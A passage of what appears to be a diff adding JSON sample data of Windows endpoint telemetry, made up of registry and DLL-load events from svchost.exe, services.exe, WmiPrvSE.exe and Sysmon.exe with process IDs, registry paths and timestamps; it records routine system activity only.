"c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883570847460000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883570847460000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883570847460000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": 
"c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883570847460000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883570847460000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883570847460000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883570847460000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883570847460000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847460000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": 
"registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847460000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847460000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847460000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 
131883570847460000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847460000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847460000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847460000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847610000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847610000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847610000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847610000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847610000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847610000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847610000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847610000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": 
"C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847610000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847610000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847610000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847610000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + 
"event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847610000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847610000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "image_load", + "image_name": "ole32.dll", + "image_path": "C:\\Windows\\System32\\ole32.dll", + "pid": 3808, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883570847610000, + "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847610000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "image_load", + "image_name": "shell32.dll", + "image_path": 
"C:\\Windows\\System32\\shell32.dll", + "pid": 3808, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883570847610000, + "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847610000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "image_load", + "image_name": "SHCore.dll", + "image_path": "C:\\Windows\\System32\\SHCore.dll", + "pid": 3808, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883570847610000, + "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" + }, + { + "event_type": "image_load", + "image_name": "windows.storage.dll", + "image_path": "C:\\Windows\\System32\\windows.storage.dll", + "pid": 3808, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883570847610000, + "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" + }, + { + "event_type": "image_load", + "image_name": "shlwapi.dll", + "image_path": "C:\\Windows\\System32\\shlwapi.dll", + "pid": 3808, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883570847610000, + "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" + }, + { + "event_type": "image_load", + "image_name": "profapi.dll", + "image_path": "C:\\Windows\\System32\\profapi.dll", + "pid": 3808, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", 
+ "timestamp": 131883570847610000, + "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" + }, + { + "event_type": "image_load", + "image_name": "fltLib.dll", + "image_path": "C:\\Windows\\System32\\fltLib.dll", + "pid": 3808, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883570847610000, + "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847610000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847610000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847610000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + 
"event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847610000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "image_load", + "image_name": "dsparse.dll", + "image_path": "C:\\Windows\\System32\\dsparse.dll", + "pid": 3808, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883570847610000, + "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570847610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570847610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + 
"registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847770000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847770000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847770000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570847770000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "image_load", + 
"image_name": "tscfgwmi.dll", + "image_path": "C:\\Windows\\System32\\tscfgwmi.dll", + "pid": 3808, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883570847610000, + "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570847770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570847930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570847930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + 
"timestamp": 131883570847930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570847930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570847930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570847930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570847930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + 
"registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570847930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570847930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570847930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570847930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570847930000, + "unique_pid": 
